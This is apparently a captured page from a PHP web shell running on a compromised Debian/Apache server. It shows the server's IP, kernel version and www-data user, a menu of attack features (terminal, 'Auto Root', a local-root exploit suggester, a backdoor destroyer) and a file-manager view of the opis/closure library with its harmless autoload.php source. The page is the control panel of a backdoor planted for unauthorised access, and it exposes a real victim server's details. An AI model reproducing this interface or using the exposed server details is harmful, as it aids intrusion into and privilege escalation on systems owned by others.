Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.0
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
vendor /
opis /
closure /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2022-04-21 14:21
CHANGELOG.md
8.38
KB
-rw-r--r--
2022-04-21 14:21
LICENSE
1.06
KB
-rw-r--r--
2022-04-21 14:21
NOTICE
306
B
-rw-r--r--
2022-04-21 14:21
README.md
3.75
KB
-rw-r--r--
2022-04-21 14:21
autoload.php
1012
B
-rw-r--r--
2022-04-21 14:21
composer.json
1.15
KB
-rw-r--r--
2022-04-21 14:21
functions.php
971
B
-rw-r--r--
2022-04-21 14:21
Save
Rename
<?php /* =========================================================================== * Copyright (c) 2018-2021 Zindex Software * * Licensed under the MIT License * =========================================================================== */ require_once __DIR__ . '/functions.php'; spl_autoload_register(function($class){ $class = ltrim($class, '\\'); $dir = __DIR__ . '/src'; $namespace = 'Opis\Closure'; if(strpos($class, $namespace) === 0) { $class = substr($class, strlen($namespace)); $path = ''; if(($pos = strripos($class, '\\')) !== FALSE) { $path = str_replace('\\', '/', substr($class, 0, $pos)) . '/'; $class = substr($class, $pos + 1); } $path .= str_replace('_', '/', $class) . '.php'; $dir .= '/' . $path; if(file_exists($dir)) { include $dir; return true; } return false; } return false; });